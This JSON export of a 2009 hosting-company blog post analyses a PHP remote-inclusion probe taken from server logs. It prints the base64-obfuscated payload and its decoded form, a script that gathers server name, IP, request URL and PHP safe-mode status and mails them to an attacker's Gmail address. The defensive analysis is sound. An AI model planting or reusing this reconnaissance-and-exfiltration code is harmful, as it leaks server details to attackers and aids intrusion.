{"id":173,"date":"2009-04-11T10:52:34","date_gmt":"2009-04-11T02:52:34","guid":{"rendered":"http:\/\/www.computersolutions.cn\/blog\/?p=173"},"modified":"2009-04-11T21:57:55","modified_gmt":"2009-04-11T13:57:55","slug":"some-remote-exploit-analysis","status":"publish","type":"post","link":"https:\/\/www.computersolutions.cn\/blog\/2009\/04\/some-remote-exploit-analysis\/","title":{"rendered":"Some remote exploit analysis"},"content":{"rendered":"<p><strong>Foreword &#8211;<\/strong> <em>Note that none of our servers are vulnerable to remote inclusion attacks.<\/em><\/p>\n<p>For the most part, most of the exploits I covered in yesterdays post are common garden php vulnerability scans.<br \/>\nSome of them are more interesting though, although more for being encrypted, than anything else.<\/p>\n<p>If I take an example from our log files:<br \/>\n<!--more--><\/p>\n<p>http:\/\/www.easy-dizzy.de\/joomla\/administrator\/includes\/js\/ThemeOffice\/copyright.txt <\/p>\n<p>This returns an encrypted string.<br \/>\nIts fairly easy to see whats been returned in that, merely by changing the eval to an echo.<\/p>\n<pre lang=\"php\">\r\n\/\/Edited slightly for width purposes\r\n$lmge = \"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb\".\r\n\"HNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9\".\r\n\"Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRw\".\r\n\"Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFU\".\r\n\"VVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGl\".\r\n\"wID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0\".\r\n\"aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3V\".\r\n\"iaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIl\".\r\n\"xuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6\".\r\n\"ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7D\".\r\n\"QokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRv\".\r\n\"b2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCgg\".\r\n\"JGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZn JvbSk7\"; \r\n\r\n\/\/eval(base64_decode($lmge));\r\n\r\n\/\/To stop execution, and merely see the script contents we echo it, instead of eval..\r\necho (base64_decode($lmge));\r\nexit;\r\n\r\n<\/pre>\n<p>This returns this:<\/p>\n<pre lang=\"php\">\r\n$creator=base64_decode(\"ZnIzM3NoM2xsQGdtYWlsLmNvbQ==\"); \r\n\r\n($safe_mode)?($safez=\"ON\"):($safez=\"OFF_HEHE\");\r\n$base=\"http:\/\/\".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; \r\n$name = php_uname(); $ip = getenv(\"REMOTE_ADDR\"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; \r\n$msg = \"\\nBASE: $base\\nuname a: $name\\nBypass: $bypasser\\nIP: $ip\\nHost: $ip2 $pwds\";\r\n$from =\"From: \".$writ.\"___=\".$safez.\"<tool@\".$_SERVER['HTTP_HOST'].\">\";\r\nmail( $creator, $subj, $msg, $from);\r\n<\/pre>\n<p>So in this case we can see the attacker wants us to email him our server details, what url worked for the exploit, and a few various php details.<\/p>\n<p>If we look at the email account he wants to email to we can see its a google account.<\/p>\n<pre lang=\"php\">\r\necho base64_decode(\"ZnIzM3NoM2xsQGdtYWlsLmNvbQ==\");   \/\/returns fr33sh3ll@gmail.com\r\n<\/pre>\n<p>Google has been notified about that account.<br \/>\nAll in all, slightly more interesting than the usual!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Foreword &#8211; Note that none of our servers are vulnerable to remote inclusion attacks. For the most part, most of the exploits I covered in yesterdays post are common garden php vulnerability scans. Some of them are more interesting though, although more for being encrypted, than anything else. If I take an example from our [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[48,25],"tags":[53,52,54,51],"class_list":["post-173","post","type-post","status-publish","format-standard","hentry","category-exploits","category-technical-mumbo-jumbo","tag-exploit","tag-hack","tag-php","tag-remote-inclusion"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/comments?post=173"}],"version-history":[{"count":4,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/173\/revisions"}],"predecessor-version":[{"id":180,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/173\/revisions\/180"}],"wp:attachment":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/media?parent=173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/categories?post=173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/tags?post=173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}